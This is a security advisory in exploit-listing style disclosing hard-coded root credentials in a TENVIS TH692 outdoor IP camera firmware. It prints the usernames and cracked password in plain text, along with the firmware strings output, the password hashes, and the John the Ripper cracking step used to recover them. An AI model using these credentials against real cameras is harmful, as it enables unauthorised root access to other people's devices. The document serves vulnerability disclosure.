TH692 Outdoor P2P HD Waterproof IP Camera Hard-Coded Credentials
Posted on 20 April 2016
Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials Date: 4/16/2016 Exploit Author: DLY Vendor: TENVIS Technology Co., Ltd Product: TH692- Outdoor P2P HD Waterproof IP Camera Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html Affected version: TH692C-V. 16.1.16.1.1.4 firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov user: Mroot pass:cat1029 user:Wproot pass: cat1029 root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root rootpath rootfs crc %lx ------------------start upgrade rootfs------------------ ------------------end upgrade rootfs------------------ bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext) nfsroot 7root Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot k01000100 rootbox nohelp info root::0: Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh nfsroot pivot_root xswitch_root chroot nfsroot root@kali:~# john --show ipcamhashes Mroot:cat1029:0:0::/root:/bin/sh Wproot:cat1029:0:0::/root:/bin/sh 2 password hashes cracked, 0 left